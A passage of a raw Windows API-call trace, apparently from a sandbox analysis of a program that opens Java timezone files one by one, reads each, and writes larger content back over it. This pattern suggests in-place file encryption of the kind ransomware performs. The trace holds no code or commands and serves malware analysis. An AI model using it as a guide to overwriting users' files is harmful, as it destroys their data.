lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.966] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.966] ReleaseMutex (hMutex=0x168) returned 1 [0118.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lubumbashi", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lubumbashi", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lubumbashi", lpUsedDefaultChar=0x0) returned 10 [0118.966] ReadFile (in: hFile=0x20c, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x2b1f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0118.968] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0118.968] WriteFile (in: hFile=0x20c, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0118.968] CloseHandle (hObject=0x20c) returned 1 [0118.968] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nairobi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nairobi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0119.495] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0119.496] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x61 [0119.496] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0119.496] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.496] ReleaseMutex (hMutex=0x168) returned 1 [0119.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Nairobi", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0119.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Nairobi", cchWideChar=7, lpMultiByteStr=0x1f7accc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Nairobi", lpUsedDefaultChar=0x0) returned 7 [0119.496] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f56c48, nNumberOfBytesToRead=0x61, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f56c48*, lpNumberOfBytesRead=0x2b1f2bc*=0x61, lpOverlapped=0x0) returned 1 [0119.497] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0119.498] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e9, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5e9, lpOverlapped=0x0) returned 1 [0119.498] CloseHandle (hObject=0x1d8) returned 1 [0119.498] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tunis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tunis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0120.903] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.903] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x149 [0120.903] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.903] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0120.903] ReleaseMutex (hMutex=0x168) returned 1 [0120.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tunis", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tunis", cchWideChar=5, lpMultiByteStr=0x1f7accc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tunis", lpUsedDefaultChar=0x0) returned 5 [0120.903] ReadFile (in: hFile=0x1f0, lpBuffer=0x268b7c8, nNumberOfBytesToRead=0x149, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268b7c8*, lpNumberOfBytesRead=0x2b1f2bc*=0x149, lpOverlapped=0x0) returned 1 [0120.904] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0120.905] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a80f8*, nNumberOfBytesToWrite=0x6d1, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a80f8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x6d1, lpOverlapped=0x0) returned 1 [0120.906] CloseHandle (hObject=0x1f0) returned 1 [0120.906] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Catamarca" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\catamarca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0120.907] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.907] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x225 [0120.907] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.907] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0120.907] ReleaseMutex (hMutex=0x168) returned 1 [0120.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Catamarca", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0120.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Catamarca", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Catamarca", lpUsedDefaultChar=0x0) returned 9 [0120.907] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x225, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x2b1f2bc*=0x225, lpOverlapped=0x0) returned 1 [0120.908] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0120.908] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a80f8*, nNumberOfBytesToWrite=0x7ad, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a80f8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x7ad, lpOverlapped=0x0) returned 1 [0120.909] CloseHandle (hObject=0x1f0) returned 1 [0120.909] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Luis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_luis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0120.910] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.910] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x22d [0120.910] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.910] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0120.910] ReleaseMutex (hMutex=0x168) returned 1 [0120.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="San_Luis", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0120.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="San_Luis", cchWideChar=8, lpMultiByteStr=0x1f735cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="San_Luis", lpUsedDefaultChar=0x0) returned 8 [0120.911] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x22d, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x2b1f2bc*=0x22d, lpOverlapped=0x0) returned 1 [0120.913] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0120.913] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a80f8*, nNumberOfBytesToWrite=0x7b5, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a80f8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x7b5, lpOverlapped=0x0) returned 1 [0120.914] CloseHandle (hObject=0x1f0) returned 1 [0120.914] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Barbados" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\barbados"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0120.916] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.916] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x89 [0120.916] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.916] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0120.916] ReleaseMutex (hMutex=0x168) returned 1 [0120.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Barbados", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0120.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Barbados", cchWideChar=8, lpMultiByteStr=0x1f7356c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Barbados", lpUsedDefaultChar=0x0) returned 8 [0120.916] ReadFile (in: hFile=0x1f0, lpBuffer=0x2673178, nNumberOfBytesToRead=0x89, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673178*, lpNumberOfBytesRead=0x2b1f2bc*=0x89, lpOverlapped=0x0) returned 1 [0120.917] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0120.917] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x611, lpOverlapped=0x0) returned 1 [0120.917] CloseHandle (hObject=0x1f0) returned 1 [0120.918] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Campo_Grande" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\campo_grande"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0120.919] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.919] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x45c [0120.919] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.919] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0120.919] ReleaseMutex (hMutex=0x168) returned 1 [0120.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Campo_Grande", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Campo_Grande", cchWideChar=12, lpMultiByteStr=0x1f735cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Campo_Grande", lpUsedDefaultChar=0x0) returned 12 [0120.920] ReadFile (in: hFile=0x1f0, lpBuffer=0x269c668, nNumberOfBytesToRead=0x45c, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2b1f2bc*=0x45c, lpOverlapped=0x0) returned 1 [0120.922] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0120.922] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ead838*, nNumberOfBytesToWrite=0x9e4, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ead838*, lpNumberOfBytesWritten=0x2b1f2d0*=0x9e4, lpOverlapped=0x0) returned 1 [0120.922] CloseHandle (hObject=0x1f0) returned 1 [0120.922] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Creston" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\creston"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0120.923] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.923] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x49 [0120.923] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.923] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0120.923] ReleaseMutex (hMutex=0x168) returned 1 [0120.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Creston", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0120.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Creston", cchWideChar=7, lpMultiByteStr=0x1f7accc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Creston", lpUsedDefaultChar=0x0) returned 7 [0120.923] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fac9c8, nNumberOfBytesToRead=0x49, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fac9c8*, lpNumberOfBytesRead=0x2b1f2bc*=0x49, lpOverlapped=0x0) returned 1 [0120.924] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0120.924] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5d1, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5d1, lpOverlapped=0x0) returned 1 [0120.925] CloseHandle (hObject=0x1f0) returned 1 [0120.925] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dominica" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dominica"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0120.926] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.926] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x41 [0120.926] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.926] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0120.926] ReleaseMutex (hMutex=0x168) returned 1 [0120.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dominica", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0120.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dominica", cchWideChar=8, lpMultiByteStr=0x1f7356c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dominica", lpUsedDefaultChar=0x0) returned 8 [0120.926] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2b1f2bc*=0x41, lpOverlapped=0x0) returned 1 [0120.927] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0120.928] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0120.928] CloseHandle (hObject=0x1f0) returned 1 [0120.928] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grand_Turk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grand_turk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0120.930] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.930] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x414 [0120.930] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.930] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0120.930] ReleaseMutex (hMutex=0x168) returned 1 [0120.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grand_Turk", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0120.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grand_Turk", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Grand_Turk", lpUsedDefaultChar=0x0) returned 10 [0120.930] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x414, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x2b1f2bc*=0x414, lpOverlapped=0x0) returned 1 [0120.933] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0120.933] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ead838*, nNumberOfBytesToWrite=0x99c, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ead838*, lpNumberOfBytesWritten=0x2b1f2d0*=0x99c, lpOverlapped=0x0) returned 1 [0120.933] CloseHandle (hObject=0x1f0) returned 1 [0120.934] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Hermosillo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\hermosillo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0120.934] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.934] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xbd [0120.935] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.935] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0120.935] ReleaseMutex (hMutex=0x168) returned 1 [0120.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hermosillo", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0120.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hermosillo", cchWideChar=10, lpMultiByteStr=0x1f7356c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hermosillo", lpUsedDefaultChar=0x0) returned 10 [0120.935] ReadFile (in: hFile=0x1f0, lpBuffer=0x1edfdb8, nNumberOfBytesToRead=0xbd, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1edfdb8*, lpNumberOfBytesRead=0x2b1f2bc*=0xbd, lpOverlapped=0x0) returned 1 [0120.936] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0120.936] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x645, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x645, lpOverlapped=0x0) returned 1 [0120.936] CloseHandle (hObject=0x1f0) returned 1 [0120.937] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Winamac" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\winamac"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0120.938] 